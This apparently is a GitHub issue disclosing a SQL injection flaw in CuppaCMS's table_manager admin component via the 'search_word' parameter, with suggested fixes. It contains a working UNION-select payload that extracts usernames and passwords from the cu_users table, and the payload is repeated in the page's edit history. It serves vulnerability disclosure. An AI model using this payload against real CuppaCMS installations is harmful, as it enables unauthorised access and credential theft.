VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
“/administrator/components/table_manager/" via the ‘search_word’ parameters.
Description: The vulnerability is present in the “/administrator/components/table_manager/" , and can
be exploited throuth a POST request via the ‘search_word’ parameters.
Impact: Allow attacker inject query and access , disclosure of all data on the system.
Suggestions: User input should be filter, Escaping and Parameterized Queries.
Payload: search_word=') union all select concat('version:',version(),'<br>'),concat('database:',database(),'<br>'),group_concat('username:',username,'<br>','password:',password),4,5,6,7,8 from cu_users-- -
Proof of concept (POC):
You can see injection code query into search_word parameters as show below
The text was updated successfully, but these errors were encountered:
truonghuuphuc
changed the title
VULNERABLE: SQL injection vulnerability exists in CuppaCMS “/administrator/components/table_manager/" via the ‘search_word’ parameters
VULNERABLE: SQL injection vulnerability exists in CuppaCMS
Jan 10, 2022
truonghuuphuc
changed the title
VULNERABLE: SQL injection vulnerability exists in CuppaCMS
VULNERABLE: SQL injection vulnerability exists in CuppaCMS “/administrator/components/table_manager/" via the ‘search_word’ parameters.
Jan 29, 2022
“/administrator/components/table_manager/" via the ‘search_word’ parameters.
be exploited throuth a POST request via the ‘search_word’ parameters.
search_word=') union all select concat('version:',version(),'<br>'),concat('database:',database(),'<br>'),group_concat('username:',username,'<br>','password:',password),4,5,6,7,8 from cu_users-- -Report.pdf
The text was updated successfully, but these errors were encountered: